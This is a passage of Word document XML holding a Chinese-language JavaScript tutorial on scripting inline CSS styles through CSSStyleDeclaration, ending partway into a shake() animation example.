      <w:r>
        <w:t>font-size</w:t>
      </w:r>
      <w:r>
        <w:t>）在名字中包含连字符。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，连字符是减号，所以不能书写以下表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.font-size="24pt";//</w:t>
      </w:r>
      <w:r>
        <w:t>语法错误！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>因此，</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象中的属性名和实际的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性名有所区别。如果一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性名包含一个或</w:t>
      </w:r>
      <w:r>
        <w:t>多个连字符，</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>属性名的格式应该是移除连字符，将每个连字符后面紧接着的字母大写。这样，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>border-left-width</w:t>
      </w:r>
      <w:r>
        <w:t>的值在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中通过</w:t>
      </w:r>
      <w:r>
        <w:t>borderLeftWidth</w:t>
      </w:r>
      <w:r>
        <w:t>属性进行访问，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>font-family</w:t>
      </w:r>
      <w:r>
        <w:t>的值用如下代码访问：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.fontFamily="sans-serif";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另外，当一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性（如</w:t>
      </w:r>
      <w:r>
        <w:t>float</w:t>
      </w:r>
      <w:r>
        <w:t>属性）在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中对应的名字是保留字时，在之前加</w:t>
      </w:r>
      <w:r>
        <w:t>"css"</w:t>
      </w:r>
      <w:r>
        <w:t>前缀来创建合法的</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDecla</w:t>
      </w:r>
      <w:r>
        <w:t>ration</w:t>
      </w:r>
      <w:r>
        <w:t>名字。由此，使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>cssFloat</w:t>
      </w:r>
      <w:r>
        <w:t>属性来设置或查询元素的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS float</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性时，记住所有的值都应该是字符串。在样式表或（</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性中，可如下书写：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>position:absolute;font-family:sans-serif;background-color:#ffffff;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>为元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>完成同样的事情，需将值放在引号中：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.pos</w:t>
      </w:r>
      <w:r>
        <w:t>ition="absolute";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.fontFamily="sans-serif";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.backgroundColor="#ffffff";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，分号在字符串的外面，它们只是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中常规的分号，</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式表中使用分号并不是用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>设置的字符串值的一部分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>而且，记住所有的定位属性都需要包含单位。因此，如下代码设置</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>属性是错误的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.left=300;//</w:t>
      </w:r>
      <w:r>
        <w:t>错误：它是数字而不是字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.left="300";//</w:t>
      </w:r>
      <w:r>
        <w:t>错误：缺少单位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中设置样式属性就像在样式表里一样，单位是必需的。设置元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>300</w:t>
      </w:r>
      <w:r>
        <w:t>像素的正确做法是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.left="300px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果通过计算的值来设置</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>属性，需要保证在最后增加单位：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.left=(x0+left_margin+left_border+left_padding)+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，作为加上字符串单位的副作用，计算的数值结果会转换成字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>回想一下，一些</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性（</w:t>
      </w:r>
      <w:r>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:t>margin-top</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>margin-right</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>margin-bottom</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>margin-left</w:t>
      </w:r>
      <w:r>
        <w:t>的复合属性。</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象也有与之对应的复合属性。例如，也能像这样设置</w:t>
      </w:r>
      <w:r>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:t>属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.margin=topMargin+"px"+rightMargin+"px"+bottomMargin+"px"+leftMargin+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>独立设置</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t>margin</w:t>
      </w:r>
      <w:r>
        <w:t>属性值更加便捷：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.marginTop=topMargin+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.marginRight=rightMargin+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.marginBottom=bottomMargin+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.marginLeft=leftMargin+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素的</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性是它的内联样式，它覆盖在样式表中的任何样式说明。内联样式一般在设置样式值时非常有用，就像上面的例子中所做的一样。</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性可以理解为代表内联样式，但是它只返回有意义的值：</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码已经</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>设置过的值或者</w:t>
      </w:r>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:t>TML</w:t>
      </w:r>
      <w:r>
        <w:t>元素显式设置了想要的内联样式的值。例如，文档可能包含一个样式表以设置所有段落的左外边距为</w:t>
      </w:r>
      <w:r>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:t>像素，但是当在读取段落元素的</w:t>
      </w:r>
      <w:r>
        <w:t>marginLeft</w:t>
      </w:r>
      <w:r>
        <w:t>属性时，会得到一个空字符串，除非该段落有一个</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性覆盖了样式表中的设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>读取元素的内联样式特别困难，对</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性来说须包含单位，对复合属性来说：在真正使用这些值的时候，代码不得不包含非同寻常的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>解析能力。总之，元素的内联样式只在设置样式的时候有用，如果需要查询元素的样式，就要使用计算样式，这将在</w:t>
      </w:r>
      <w:r>
        <w:t>16.4</w:t>
      </w:r>
      <w:r>
        <w:t>节中讨论。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有时，发现作为单个字符串值来设置或查询元素的内联样式反而比作为</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象更加简单。为此，可以使用元素的</w:t>
      </w:r>
      <w:r>
        <w:t>getAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>方法或</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>cssText</w:t>
      </w:r>
      <w:r>
        <w:t>属性来实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>两者都可设置</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的样式属性为字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.setAttribute("style",s);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.cssText=s;//</w:t>
      </w:r>
      <w:r>
        <w:t>两者都可查询元素的内联样式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s=e.getAttribute("style");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s=e.style.cssText;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="415" w:name="CSSDong_Hua_"/>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>动画</w:t>
      </w:r>
      <w:bookmarkEnd w:id="415"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>脚本化的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>最常见的用途之一是产生视觉动画效果。使用</w:t>
      </w:r>
      <w:r>
        <w:t>setTimeout()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>setInterval()</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>14.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）重复调用函数来修改元素的内联样式达到目的。例</w:t>
      </w:r>
      <w:r>
        <w:t>16-3</w:t>
      </w:r>
      <w:r>
        <w:t>用两个函数</w:t>
      </w:r>
      <w:r>
        <w:t>shake()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>来举例说明。</w:t>
      </w:r>
      <w:r>
        <w:t>shake()</w:t>
      </w:r>
      <w:r>
        <w:t>将元素从一边到另一边快速移动或</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>震动</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，例如，当输入无效的数据时，它吸引用户的注意力。</w:t>
      </w:r>
      <w:r>
        <w:t>fadeOut()</w:t>
      </w:r>
      <w:r>
        <w:t>通过指定的时间（默认是</w:t>
      </w:r>
      <w:r>
        <w:t>500</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒）降低元素的不透明度，使得元素淡出和消失。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>16-3</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>动画</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>转</w:t>
      </w:r>
      <w:r>
        <w:t>化为相对定位的元素，使之左右</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>震动</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>第一个参数可以是元素对象或者元素的</w:t>
      </w:r>
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果第二个参数是函数，以</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>为参数，它将在动画结束时调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>第三个参数指定</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>震动的距离，默认是</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>像素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>第四个参数指定震动多久，默认是</w:t>
      </w:r>
      <w:r>
        <w:t>500</w:t>
      </w:r>
      <w:r>
        <w:t>毫秒</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function shake(e,oncomplete,distance,time){//</w:t>
      </w:r>
      <w:r>
        <w:t>句柄参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(typeof e==="string")e=document.getElementById(e);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!time)time=500;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!distance)dist</w:t>
      </w:r>
      <w:r>
        <w:t>ance=5;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var originalStyle=e.style.cssText;//</w:t>
      </w:r>
      <w:r>
        <w:t>保存</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的原始</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.position="relative";//</w:t>
      </w:r>
      <w:r>
        <w:t>使</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>相对定位</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var start=(new Date()).getTime();//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，动画的开始时间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>animate();//</w:t>
      </w:r>
      <w:r>
        <w:t>动画开始</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
